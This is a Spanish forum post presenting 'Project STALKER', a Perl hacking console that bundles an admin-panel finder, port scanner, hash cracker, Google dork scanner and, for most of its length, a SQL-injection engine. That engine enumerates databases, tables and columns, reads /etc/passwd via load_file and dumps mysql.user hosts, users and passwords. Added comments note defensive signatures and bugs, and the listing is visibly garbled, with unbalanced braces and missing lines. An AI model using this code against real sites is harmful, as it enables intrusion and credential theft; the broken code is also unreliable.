Bueno, acá les traigo un programa que he estado
haciendo esta última semana.
Se llama stalker; sirve como consola en caso de que cmd.exe no esté
disponible y tiene las siguientes funciones:
- Mostrar IP de servidor especifico
- Capturar todos los links de una pagina
- Recibir procesos de nuestra maquina
- Cerrar el proceso que nos moleste
- Conectar a un servidor y mostrar respuesta
- Capturar metodos HTTP de un servidor web
- Verificar listado de directorios en una pagina
- Codificacion y decodificacion de hex/ascii/base64
- Escanear puertos de una IP
- Buscar panel de administracion
- Crackear hash md5 mediante webs
- Buscar en google paginas vulnerables a SQLI
- Cliente FTP
- Navegador por nuestros archivos y directorios
- Y ejecutar comandos
#!usr/bin/perl
#Project STALKER (C) Doddy Hackman 2011
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#
#You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
#
use IO::Socket;
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::Process;
use Net::FTP;
use Cwd;
use URI
::Split qw(uri_split
); use MIME::Base64;
use DBI;
use Color::Output;
# Initialises Color::Output for the cprint() calls used throughout the file.
# NOTE(review): no ";" ends this line in the listing, so as written the
# @panels assignment below is presumably parsed as the argument list of Init.
Color::Output::Init
# Relative paths that scanpanel() appends to a base URL and requests one by
# one.  On the server side this looks like a burst of requests for
# admin/login paths from a single client within a few seconds, most of them
# answered with an error status -- a straightforward access-log / WAF
# signature for web-application monitoring.
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');
# Presumably meant to create the log directory, but the block body is empty,
# and the path it tests ("/logs/webs", absolute) is not the relative
# "logs/webs/" that savefile() writes under -- so nothing is ever created.
unless (-d "/logs/webs") {
}
# Shared HTTP client for every web request in the script (toma/tomax/tomar).
# The User-Agent is a fixed, spoofed Firefox 2 string; on the server side
# that exact string is a reliable fingerprint of this tool.
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
head();
getinfo();
# No sub named "next" is defined anywhere in this listing, so this handler
# reference is unresolved and Ctrl-C behaviour is undefined here.
$SIG{INT} = \&next;
# Main read-eval loop: menujo() reads and dispatches one stdin line per turn.
while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}
sub getinfo {
# Print the OS name, the Windows login name and the domain name in colour 13.
# Assigns the package globals $so, $login and $domain as a side effect, in
# that order.
($so, $login, $domain) = ($^O, Win32::LoginName(), Win32::DomainName());
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
cprint "\x030";
}
# Command dispatcher for the interactive console.  Reads one line from stdin
# and tests it, unanchored, against each command name listed in helpme();
# the first matching branch receives the regex captures.  Because the matches
# are unanchored, e.g. "help" also fires for any line that merely contains it.
# NOTE(review): the braces in this listing do not balance (see the stray "}"
# after the getprocess branch and inside the "navegator" branch), so lines
# are missing from the paste; the comments below cover only what is visible.
sub menujo {
chomp (my $cmd = <stdin>);
if ($cmd=~/getinfo/ig) {
getinfo();
}
elsif ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n"; }
print "\n[IP] : ".getip
($1)."\n"; }
elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n"; $code = toma($1);
my @re = get_links($code);
# The loop that would print each extracted link has an empty body here.
for my $url(@re) {
}
print "\n\n[+] Finish\n"; }
elsif ($cmd=~/help/) {
helpme();
}
elsif ($cmd=~/getprocess/) {
my %re = getprocess();
# $t and $data are never assigned in the visible code; the loop over %re
# that presumably set them is absent from the listing.
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n"; print "[+] PID : ".$re{$data}."\n\n"; }
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed"; }
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar
($1,$2,$3); }
# Sends a bare "GET / HTTP/1.0" line to port 80 and reports an Allow: header
# if the reply carries one.
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n"; }}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en
($1)."\n\n"; }
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de
($1)."\n\n"; }
elsif ($cmd=~/download (.*) (.*)/) {
# List assignment precedence: this only sets $file (to $1); $name and $2
# are evaluated and discarded.  The values are re-read from $1/$2 below.
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n"; }
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii
($1)."\n\n"; }
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de
($1)."\n\n"; }
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base
($1)."\n\n"; }
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de
($1)."\n\n"; }
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
# Reads a search query and a page count from stdin, collects result URLs
# through google(), and hands every URL containing "=" to sql().
elsif ($cmd=~/scangoogle/) {
chomp(my $dork = <stdin>); chomp(my $pages = <stdin>); print "\n\n[Starting the search]\n\n"; my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n"; print "[Starting the scan]\n\n\n"; for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n"; }
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
# Local file browser.  Only the "list", "rename" and "help" sub-commands have
# visible effects; the "cd", "del" and "open" branches are empty or have
# unmatched else clauses in this listing.
elsif ($cmd=~/navegator/) {
nave:
chomp(my $rta = <stdin>); if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n"; } else {
print "[Directory] : ".$_."\n"; }}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
print "\n[+] Directory changed\n"; } else {
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
print "\n[+] File Deleted\n"; } else {
}
} else {
print "\n[+] Directory Deleted\n"; } else {
}}}
if ($rta=~/rename (.*) (.*)/) { if (rename(getcwd
()."/".$1,getcwd
()."/".$2)) { print "\n[+] File Changed\n"; } else {
}}
my $file = $1;
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n"; }
next;
}
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
# Entry point to the SQL-injection routines; "--" is the comment token
# handed to scansqli() as its second argument.
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
# Presumably the tail of an "exit" branch whose condition line is missing.
copyright();
<stdin>;
}
else {
}
#print "\n\n";
}
# Driver for the SQL-injection workflow.  $_[0] is the target URL, $_[1] the
# comment token ("--" from the kobra command).  A URL that already carries
# the "hackman" placeholder goes straight to menu_options(); otherwise the
# helper called as &length() (its "sub" line is missing from this listing)
# probes the page and, on success, the menu is entered with its result.
# Findings are appended to logs/webs/<host>.txt through savefile().
sub scansqli {
# $pass receives a list-returning call in scalar context (see bypass()).
print "[Status] : Scanning.....\n"; $pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
# Redeclares $save in the same scope ("my" variable masks earlier declaration).
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n"; &menu_options($gen,$pass,$save);
} else {
print "[Status] : Length columns not found\n\n"; menujo();
}
}
# NOTE(review): this is the body of the helper called as &length() from
# scansqli; its "sub length {" line is absent from the listing (the five
# closing braces on the last line only balance if a sub header precedes
# "my $rows").  Callers use the &length(...) form because a plain
# length(...) would resolve to the Perl builtin.
# Defender's view: every request built here carries the literal tokens
# "RATSXPDOWN" and, in the saved URL, "hackman", plus "order by 9999999999"
# -- all usable verbatim as WAF / access-log signatures for this tool.
my $rows = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
$code = toma($inyection);
# Fingerprints a vulnerable page by MySQL/PHP error text in the response;
# applications that return generic error pages never match this test.
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
unless ($testar1 eq $testar2) {
# $1 here is whatever the last successful match above captured (only the
# first alternative has a capture group), so $patha is often empty.
my $patha = $1;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
# The pattern is split across lines in this listing; as shown, the
# literal newlines inside m{...}g would have to appear in the page too.
@number = $test =~m{RATSXPDOWN
(\d+)RATSXPDOWN
}g
; $control = 1;
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman
/; savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control); }}}}}
# Reports what the injection point exposes: whether information_schema.tables
# and mysql.user can be read, whether load_file() works, and the values of
# version(), database() and user().  The marker char(69,82,84,79,82,56,53,52)
# spells "ERTOR854" and 0x2f6574632f706173737764 is "/etc/passwd", which is
# the file used for the load_file() test.  Each result is echoed and appended
# to logs/webs/<save>.txt.  Mitigation on the database side: a least-privilege
# application account (no SELECT on mysql.*, no FILE privilege) makes every
# probe here report OFF.
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n"; my ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n"; } else {
print "[mysql.user] : OFF\n"; savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n"; savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n"; savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
# Message means "load_file allows viewing files".
print "[+] load_file permite ver los archivos\n"; savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n"; savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n"; }}}
# Sub-menu shown once an injection point is confirmed.  Prompts with the log
# file name, reads one command from stdin and dispatches to the schema*,
# mysqluser, dump and details helpers; each branch re-enters this menu via
# &reload.  $_[0] is the page with the "hackman" placeholder, $_[1] the
# bypass token.
# NOTE(review): the listing is damaged here -- the help text after
# "if ($rta=~/help/) {" lost its "print q(" opener, and the "next; }" after
# the logs branch closes the sub before the dumper/details branches.
sub menu_options {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>"; chomp (my $rta = <stdin>);
if ($rta=~/help/) {
commands : details tables columns dbs othertable othercolumn
mysqluser dumper logs
exit
);
}
if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
# Only computes the log path; whatever displayed it is not in the listing.
$t = "logs/webs/$save.txt";
&reload;
}
next;
}
elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}
# Lists table names of the current database through information_schema.tables
# (count first, then one row per "limit N,1" request, starting at offset 17
# to skip the built-in schemas) and logs them.  char(82,65,84,83,88,80,68,
# 79,87,78,49) spells the "RATSXPDOWN1" marker matched below.
# NOTE(review): the s/hackman/.../ substitutions are split across lines in
# this listing; as written, the literal newline after "hackman" means the
# pattern cannot match a normal URL, so these were presumably single lines.
sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n"; $page =~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),table_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length : $total\n\n"; savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length : $total\n");
# The loop variable below shadows this $limit with the same name.
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
print "[Table $real Found : $table ]\n"; savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n"; }
}
sub reload {
# Re-enter menu_options() with only the first argument of this call.
# Callers invoke it as "&reload;" (no parentheses), which hands over their
# own @_ unchanged, so $_[0] is the caller's page argument.
my $first_arg = $_[0];
menu_options($first_arg);
}
# Lists the column names of $table in the current database via
# information_schema.columns (count first, then one row per "limit N,1"
# request) and logs them under $save.txt.  char(82,65,84,83,88,80,68,79,87,
# 78,49) spells the "RATSXPDOWN1" marker matched below.
# NOTE(review): the s/hackman/.../ substitutions are split across lines in
# this listing; the literal newline after "hackman" means they cannot match
# a normal URL as shown, so these were presumably single lines.
sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n"; savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n"; savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
$page4=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),column_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n"; }}
# Lists database names via information_schema.schemata (count first, then
# one "limit N,1" request per row), skipping information_schema, mysql and
# phpmyadmin, and logs them.  char(82,65,84,83,88,80,68,79,87,78,49) spells
# the "RATSXPDOWN1" marker.  Note the count request omits $pass2 while the
# per-row requests append it.
# NOTE(review): the s/hackman/.../ substitutions are split across lines in
# this listing; the literal newline after "hackman" means they cannot match
# a normal URL as shown, so these were presumably single lines.
sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n"; ($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n"; savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),schema_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n"; savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n"; }
}
# Same as schematables() but restricted to the database named in $_[2]
# (table_schema filter); $_[3] is the log file base name.  The commented
# print lines were debugging output of the request URLs.
# NOTE(review): the s/hackman/.../ substitutions are split across lines in
# this listing; the literal newline after "hackman" means they cannot match
# a normal URL as shown, so these were presumably single lines.
sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n"; ($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),table_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $page1=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[+] Tables Length : $1\n\n"; savefile($_[3].".txt","[+] Tables Length : $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n"; $real++;
}}
} else {
print "\n[-] information_schema = ERROR\n"; }}
# Same as schemacolumns() but restricted to the database $db (table_schema
# filter in addition to table_name).  Note that the bypass token is taken
# from $_[1] rather than the unpacked $bypass -- the same value.
# NOTE(review): the s/hackman/.../ substitutions are split across lines in
# this listing; the literal newline after "hackman" means they cannot match
# a normal URL as shown, so these were presumably single lines.
sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n"; savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n"; savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
$page4=~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),column_name
,char
(82,65,84,83,88,80,68,79,87,78,49))))/; $real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n"; savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n"; }
}
# Reads Host, User and Password from mysql.user through the injection point,
# one "limit N,1" request per row, and logs each triple.  0x524154535850444f574e
# is the hex form of the "RATSXPDOWN" marker.  This only works when the web
# application's database account can SELECT from mysql.user -- the standard
# least-privilege setup (no grants on mysql.*) makes it report ERROR.
# NOTE(review): the s/hackman/.../ substitutions are split across lines in
# this listing; the literal newline after "hackman" means they cannot match
# a normal URL as shown, so these were presumably single lines.
sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n"; ($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman
/concat
(char
(82,65,84,83,88,80,68,79,87,78,49))/; $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman
/unhex
(hex(concat
(char
(82,65,84,83,88,80,68,79,87,78,49),Count
(*),char
(82,65,84,83,88,80,68,79,87,78,49))))/; $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[+] Users Found : $1\n\n"; savefile($save.".txt","\n[+] Users mysql Found : $1\n");
# The loop bound is $1 from the match above; it is re-read each iteration.
for my $limit(0..$1) {
$cop =~s/hackman
/unhex
(hex(concat
(0x524154535850444f574e
,Host
,0x524154535850444f574e
,User
,0x524154535850444f574e
,Password
,0x524154535850444f574e
)))/; $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n"; savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
